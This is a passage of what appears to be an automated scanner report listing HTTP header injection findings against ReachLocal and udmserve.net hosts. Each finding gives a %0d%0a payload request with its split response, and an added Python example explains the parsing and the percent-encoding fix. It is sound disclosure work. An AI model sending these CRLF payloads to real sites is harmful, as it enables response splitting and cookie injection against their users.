GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=d0f4f%0d%0a6e008c98e33&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?d0f4f
6e008c98e33

Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:40 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?d0f4f
6e008
...[SNIP]...

1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_rurl request parameter is copied into the Location response header. The payload b10dd%0d%0a3788128dbfd was submitted in the RL_rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /redirect?RL_rurl=b10dd%0d%0a3788128dbfd&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:37 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: b10dd
3788128dbfd
?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 571
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:29 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="b10dd
3788128dbfd?scid=2323693&amp;cid=837045&
...[SNIP]...

1.7. http://udmserve.net/udm/img.fetch [dt cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The value of the dt cookie is copied into the Set-Cookie response header. The payload 6ab88%0d%0a0adc77508cd was submitted in the dt cookie. This caused a response containing an injected HTTP header.

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: udm1=9173:1:63440343934:1:2900:0:0:63440343934:1:1|; dt=6ab88%0d%0a0adc77508cd; __qca=P0-679846959-1315331134624

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440344253:14:2900:0:0:63440344253:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:50:53 GMT
Set-Cookie: dt=6ab88
0adc77508cd
; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12: 50:53 GMT
Expires: Mon, 05 Sep 2011 12:50:53 GMT
Date: Tue, 06 Sep 2011 12:50:53 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...

1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Bottom_facebook.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2516f%0d%0a0b50936584 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2516f%0d%0a0b50936584/Bottom_facebook.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/2516f
0b50936584
/Bottom_facebook.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:13 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/2516f
0b50936584/Bottom_facebo
...[SNIP]...

1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_CSportalHead.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 54340%0d%0a57bb639a64e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /54340%0d%0a57bb639a64e/Rsidepanel_CSportalHead.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Location: http://utdi.com/54340
57bb639a64e
/Rsidepanel_CSportalHead.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/54340
57bb639a64e/Rsidepanel_C
...[SNIP]...

1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-contact.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ae4cb%0d%0a0096e3364fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /imagesae4cb%0d%0a0096e3364fc/Rsidepanel_ID-contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/imagesae4cb
0096e3364fc
/Rsidepanel_ID-contact.jpg
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/imagesae4cb
0096e3364fc/Rsidep
...[SNIP]...
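Worked example, added to this report and not part of the XSS.Cx output or of any ReachLocal code. The finding above rests on one fact: the server URL-decodes the first path segment, so %0d%0a becomes a literal CR LF, and then copies the decoded value into Location. Anything after the CR LF is therefore delivered on its own line inside the header block. The script reconstructs the 1.10 response as it would arrive on the wire (constructed from the capture; the body is abbreviated), parses the header block the way a client or proxy does, applies the check the scanner applied (does the tail of the decoded payload start a header line of its own?), and then shows the server-side fix: percent-encoding each path segment before it is placed in Location. A second constructed response, with a header-shaped tail, goes beyond the page to show why the severity is High: once the tail looks like "Name: value", the parser accepts it as a genuine response header. The hostnames and cookie value are taken from the capture; the function names are this example's own.

```python
"""CRLF / HTTP header injection: how the split response is parsed, and the fix.

Added example for this report (not scanner or vendor code).  Both raw
responses below are constructed: the first mirrors finding 1.10, the
second is hypothetical and exists only to show a header-shaped tail.
"""
from urllib.parse import quote, unquote

# Constructed from the 1.10 capture: the decoded %0d%0a sits inside Location.
RAW_RESPONSE_1_10 = (
    b"HTTP/1.1 302 Found\r\n"
    b"Date: Tue, 06 Sep 2011 11:53:02 GMT\r\n"
    b"Server: Apache\r\n"
    b"Location: http://utdi.com/imagesae4cb\r\n"
    b"0096e3364fc/Rsidepanel_ID-contact.jpg\r\n"
    b"Vary: Accept-Encoding\r\n"
    b"Content-Length: 319\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;"
    b"expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly\r\n"
    b"\r\n"
    b"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n"
)

# Hypothetical: same server behaviour, but the text after the CRLF is
# shaped like a header.  Not observed on the page; illustrates the parser.
RAW_RESPONSE_HEADER_SHAPED = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: Apache\r\n"
    b"Location: http://utdi.com/abc\r\n"
    b"X-Injected: 1/x.jpg\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def split_headers(raw: bytes):
    """Tokenise a raw response like a client: split the header block on
    CRLF, then each line on its first ':'.  Lines without a 'Name:' prefix
    are returned separately as malformed so the caller can see them."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers, malformed = [], []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name and b" " not in name.strip():
            headers.append((name.decode("latin-1").strip(),
                            value.decode("latin-1").strip()))
        else:
            malformed.append(line.decode("latin-1"))
    return status, headers, malformed


def header_injection_evidence(raw: bytes, payload: str):
    """The scanner's check: URL-decode the submitted payload; if it contains
    a CRLF, look for the text after that CRLF at the start of its own line
    in the header block.  Returns the matching line, or None."""
    decoded = unquote(payload)
    if "\r\n" not in decoded:
        return None
    tail = decoded.split("\r\n", 1)[1]
    head, _, _body = raw.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:
        text = line.decode("latin-1")
        if text.startswith(tail):
            return text
    return None


def safe_location(base: str, *segments: str) -> str:
    """Hardened redirect builder.  Every path segment is percent-encoded
    (nothing left in the 'safe' set) before it reaches the header, so CR,
    LF and other control bytes can no longer end the Location value.  The
    final scan is defence in depth: a control character here is a bug."""
    encoded = [quote(seg, safe="") for seg in segments]
    location = base.rstrip("/") + "/" + "/".join(encoded)
    if any(ord(c) < 0x20 or c == "\x7f" for c in location):
        raise ValueError("control character in Location")
    return location


if __name__ == "__main__":
    print(header_injection_evidence(RAW_RESPONSE_1_10, "ae4cb%0d%0a0096e3364fc"))
    print(split_headers(RAW_RESPONSE_HEADER_SHAPED)[1])
    print(safe_location("http://utdi.com", "imagesae4cb\r\n0096e3364fc",
                        "Rsidepanel_ID-contact.jpg"))
```

With the 1.10 payload the injected line has no colon, so a strict parser reports it as a malformed line and the finding is a parse oddity; with a header-shaped tail the same code path yields an attacker-chosen header, which is the behaviour the scanner's High rating anticipates. The fix belongs on the server: build Location from percent-encoded segments (or reject any decoded segment containing bytes below 0x20) rather than echoing the decoded request path.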

1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-pr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3eb55%0d%0aefef98aca08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images3eb55%0d%0aefef98aca08/Rsidepanel_ID-pr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/images3eb55
efef98aca08
/Rsidepanel_ID-pr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images3eb55
efef98aca08/Rsidep
...[SNIP]...

1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-specials.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cbce7%0d%0a95d968751a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cbce7%0d%0a95d968751a4/Rsidepanel_ID-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/cbce7
95d968751a4
/Rsidepanel_ID-specials.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/cbce7
95d968751a4/Rsidepanel_I
...[SNIP]...

1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_UTDI-G.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ca126%0d%0a0d553889d45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ca126%0d%0a0d553889d45/Rsidepanel_UTDI-G.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/ca126
0d553889d45
/Rsidepanel_UTDI-G.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ca126
0d553889d45/Rsidepanel_U
...[SNIP]...

1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_UTDiStore.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36ce5%0d%0aa169a199146 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36ce5%0d%0aa169a199146/Rsidepanel_UTDiStore.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/36ce5
a169a199146
/Rsidepanel_UTDiStore.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36ce5
a169a199146/Rsidepanel_U
...[SNIP]...

1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_btm.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8ea78%0d%0a6eb580edc8f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8ea78%0d%0a6eb580edc8f/Rsidepanel_btm.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/8ea78
6eb580edc8f
/Rsidepanel_btm.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/8ea78
6eb580edc8f/Rsidepanel_b
...[SNIP]...

1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_mid-specials.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fa623%0d%0a91d1427d552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fa623%0d%0a91d1427d552/Rsidepanel_mid-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
